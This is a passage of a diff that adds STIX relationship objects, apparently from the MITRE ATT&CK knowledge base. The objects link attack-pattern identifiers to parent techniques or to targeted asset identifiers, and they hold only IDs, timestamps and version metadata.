"2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1628074c-99e3-42b3-bea9-85c7fe6a6bb8", + "created": "2020-01-24T15:11:03.012Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--162f9749-38f1-46d8-9f59-e3667f84f0bf", + "created": "2024-06-26T19:24:29.396Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:24:29.396Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16353cd9-64bb-4f4a-8678-e1b7ab1d4ec2", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16377d2e-296a-4e3c-91c4-3dc06b056659", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--163e8535-5a1f-4e09-99ca-3132c075a137", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1661cce4-3630-4af0-9427-db4fcb09452b", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--167da9f9-40a1-41a8-bdd8-780f60800499", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--169e99ca-998a-4dbf-b153-1b1aa0d3cdbd", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--169ffa45-bb69-48ff-9ad3-95316b88ec98", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16a0a0ca-3d34-429a-bd18-2837f77f6663", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16ac0172-02d1-4fda-99c0-61f1cef7dc4b", + "created": "2023-09-28T20:06:03.889Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:06:03.889Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16b296ee-3406-44da-b740-d28778981ea2", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16b74b29-e3b3-49ff-9ff4-cd7ade0f8ff4", + "created": "2023-09-29T18:48:52.853Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:48:52.853Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16b89cef-0a7a-4472-8936-5d4736e85482", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16c7240e-0559-4c49-9003-1bfe97074252", + "created": "2024-04-09T21:02:28.446Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T21:02:28.446Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16e0b0a5-2542-44a5-af19-b40cb2bb5307", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16f32a6c-8083-4576-aa28-76bd833c649f", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--16f472ba-e66d-4317-bb52-b9e3ce76b37b", + "created": "2019-12-12T15:08:21.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "target_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1713622d-f3fa-4ec4-b63a-3d2a75c23398", + "created": "2020-02-21T21:08:33.353Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", + "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--171bb55e-c030-47bf-ba65-2c982babcb44", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--171dbca3-68e5-4cc0-b9fa-99091e4ef461", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--172278d2-2c48-4c16-bdd2-84e04100e044", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1736df4d-188e-4a44-a8b3-6c6cd71dc749", + "created": "2023-09-29T17:05:30.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:05:30.498Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--17446770-7628-4800-99a9-1c53ce8c3589", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--174e9141-4d74-4ecf-a2ae-72eaeee1ffb4", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1751deaf-d5ad-4c05-921c-7938b5e82de9", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--176292e7-29bf-46aa-81ab-dea0d52c37b5", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1776b157-2509-4780-a6f9-595bc8f53c32", + "created": "2024-06-26T15:03:14.412Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:03:14.412Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--177c9ffd-e2fb-4966-be72-c48750d6cd9b", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--178ff32b-fee8-4171-83eb-cb2784d0468f", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--17a68423-4d98-4f2a-936c-949774ff48ef", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--17aeaa53-c90c-492b-8310-4a3fa0b718a9", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--17d5794d-dcd5-4e0f-87e4-87d41c24b5fa", + "created": "2023-10-02T20:18:01.546Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:18:01.546Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--17dee12a-bb91-4827-8400-bad232c65cd0", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--17fd7ffd-63d9-4e1e-8b19-38095b2d65ab", + "created": "2023-09-29T17:45:45.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:45:45.485Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--17fdc22e-c9c5-4016-9f7e-16d0813a8b67", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1800c5f8-fa24-4df3-85e1-f6c763f63457", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1805e767-1d0c-4fdd-84b5-879a3b058064", + "created": "2024-06-27T09:04:20.884Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:04:20.884Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--180adc69-1f21-4467-b647-ae4d9c520208", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + 